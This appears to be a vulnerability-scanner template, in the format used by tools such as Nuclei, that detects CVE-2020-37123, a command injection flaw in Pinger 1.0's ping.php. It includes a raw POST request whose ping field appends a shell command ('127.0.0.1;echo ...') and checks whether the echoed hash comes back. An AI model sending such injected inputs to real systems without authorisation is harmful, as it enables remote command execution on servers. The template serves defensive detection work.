Pinger 1.0 - Remote Code Execution

id: CVE-2020-37123

info:
  name: Pinger 1.0 - Remote Code Execution
  author: bswearingen
  severity: critical
  description: |
    Pinger 1.0 contains a remote code execution vulnerability that allows attackers to inject shell commands through the ping and socket parameters. Attackers can exploit the unsanitized input in ping.php to write arbitrary PHP files and execute system commands by appending shell metacharacters.
  impact: |
    An unauthenticated attacker can execute arbitrary system commands on the server.
  remediation: |
    Remove Pinger or apply input validation to sanitize the ping and socket parameters.
  reference:
    - https://www.exploit-db.com/exploits/48323
    - https://nvd.nist.gov/vuln/detail/CVE-2020-37123
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-37123
    epss-score: 0.15719
    epss-percentile: 0.94803
    cwe-id: CWE-78
  metadata:
    verified: true
    vendor: pinger
    product: pinger
  tags: cve,cve2020,pinger,rce,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "ping.php"
        internal: true

  - raw:
      - |
        POST /ping.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ping=127.0.0.1;echo+{{md5('CVE-2020-37123')}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5('CVE-2020-37123')}}"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008647a0750bd602055e461ef6752159334ba5bec26f6192799e376feb135ef3c40221008cae5074c6709e33baec6512ae1c23d5ad9641773101d50a7e22f2717d4cbdfc:922c64590222798bb761d5b6d8e72950